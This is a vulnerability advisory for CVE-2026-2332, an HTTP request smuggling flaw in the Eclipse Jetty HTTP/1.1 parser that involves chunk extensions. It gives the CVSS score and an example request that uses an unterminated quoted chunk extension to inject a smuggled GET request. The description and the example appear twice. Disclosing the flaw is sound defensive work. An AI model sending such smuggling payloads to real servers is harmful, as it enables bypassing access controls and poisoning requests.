CVE-2026-2332
HIGH SEVERITYCVSS Score & Metrics
Base Score
7.4 / 10
Vector String
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Vulnerability Description
In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:
* https://w4ke.info/2025/06/18/funky-chunks.html
* https://w4ke.info/2025/10/29/funky-chunks-2.html
Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.
POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
1;ext="val
X
0
GET /smuggled HTTP/1.1
...
Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.
* https://w4ke.info/2025/06/18/funky-chunks.html
* https://w4ke.info/2025/10/29/funky-chunks-2.html
Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.
POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
1;ext="val
X
0
GET /smuggled HTTP/1.1
...
Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.
Vulnerability Details
Published Date
Last Modified
CWE ID
CWE-444
Source
NVD
Vendor
maven
Product
org.eclipse.jetty:jetty-http
Discussion (0)
Add Comment
No comments yet. Be the first!